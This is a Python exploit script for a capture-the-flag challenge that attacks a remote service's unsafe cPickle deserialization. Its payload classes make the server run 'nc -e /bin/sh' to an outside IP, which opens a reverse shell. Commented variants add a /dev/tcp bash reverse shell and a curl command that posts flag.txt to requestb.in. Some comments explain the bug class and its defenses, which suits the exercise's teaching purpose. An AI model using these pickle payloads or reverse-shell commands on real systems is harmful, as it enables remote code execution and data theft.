#!/usr/bin/python
## Exploiting python cpickle - pwn300-bubble_bass @ 3dsctf-2k16
# @author intrd - http://dann.com.br/
# @license Creative Commons Attribution-ShareAlike 4.0 International License - http://creativecommons.org/licenses/by-sa/4.0/
# int_netcat.py - https://gist.github.com/intrd/00a39c83f752acf81775bfa9721e745a
# int_caesar.py - https://gist.github.com/intrd/2c19d329885dfee9fc70c38910394a7d
import re, sys, os, subprocess, cPickle
sys.path.append("../../LIBS/")
from int_netcat import Netcat
from int_caesar import intCaesar
# --- Step 0: the service greets us with "... of A + B =" and waits for the sum.
nc = Netcat('34.197.58.21', 9997)
prompt = nc.read_until(' =')
print(prompt)


def _addends(text):
    """Return the two operands of the "of A + B =" prompt as ints.

    Uses the same two patterns as the original inline version, so a prompt
    that matches neither still raises AttributeError (re.search -> None).
    """
    left = re.search(r'of (.*) \+', text).group(1)
    right = re.search(r'\+ (.*) =', text).group(1)
    return int(left), int(right)


first, second = _addends(prompt)
answer = first + second
print(answer)
nc.write(str(answer) + '\n')
prompt = nc.read()
print(prompt)

# --- Step 1: decrypt the ciphered message offline, then paste the plaintext below.
# Brute-force every shift with intCaesar and pick the readable one by eye:
# msg = "Toik! Znk Igkygx iovnkx, gryu qtuct gy g ynolz iovnkx, oy utk ul znk yosvrkyz luxsy ul ktixevzout. Tuc, utk rgyz wakyzout..."
# for x in range(0, 50):
#     try:
#         print "shift: " + str(x) + " " + intCaesar(msg, x)
#     except Exception as e:
#         print e
# sys.exit(0)
# ..rot=20 gave the plaintext in my run; it may differ between sessions.
msg = "PUT HERE THE DECIPHERED MESSAGE."
nc.write(str(msg) + '\n')
prompt = nc.read()
print(prompt)
class RunBinSh(object):
    # Pickle's extension hook: dumps() records the (callable, args) tuple that
    # __reduce__ returns, and loads() on the receiving side *calls* it to
    # "reconstruct" the object.  That is the whole bug class -- whoever
    # controls the pickle bytes controls the callable, so pickle/cPickle must
    # never be used to load data from an untrusted peer.
    def __reduce__(self):
        return (subprocess.Popen, (('/bin/sh',),))
#payload = cPickle.dumps(RunBinSh()) #testing whether the server accepts my command
class GetShell(object):
    # Same mechanism as RunBinSh with a different callable.  Nothing here is
    # specific to this CTF service: any code path that feeds bytes from a
    # socket, file or message queue into cPickle.loads()/pickle.loads() is
    # exposed the same way, and there is no "safe" pickle payload filter to
    # add after the fact.  The fix is structural: exchange a data-only
    # format (JSON) across trust boundaries, or at minimum authenticate the
    # blob (HMAC) before loading and restrict Unpickler.find_class to an
    # allow-list so arbitrary module-level callables cannot be resolved.
    def __reduce__(self):
        #return (os.system, ('cat flag.txt',)) # nope, we are blind..
        #return (os.system, ('/bin/sh </dev/tcp/175.14.11.121/6888 >&0 2>&0',)) # this shellscript didn't workd..
        return (os.system, ('nc -e /bin/sh 175.14.11.121 6888',)) # w/ this we get a fully working reverse shell
        #return (os.system, ('curl -X POST -d "@./flag.txt" http://requestb.in/13f8pqd1',)) # just for note, the rev shell is not really needed here.. in this case the curl is installed and we know where the flag is.. just send flag.txt contet through curl using requestb.in
# Serialise: the resulting bytes embed (os.system, (cmd,)), not an object.
payload = cPickle.dumps(GetShell())
# Equivalent hand-written pickle opcodes (c = GLOBAL, R = REDUCE); shows the
# payload needs no class on the receiving side at all.
# me = "175.14.11.121"
# payload = "cposix\nsystem\np0\n(S'/bin/bash -i &gt;&amp; /dev/tcp/%s/6888 0&gt;&amp;1'\np1\ntp2\nRp3\n." % me
print payload
# NOTE(review): the server is presumably calling cPickle.loads() on the raw
# socket data -- not visible from this script; that call is the defect a
# defender would look for, not the client side shown here.
nc.write(payload)
data=nc.read()
print(data)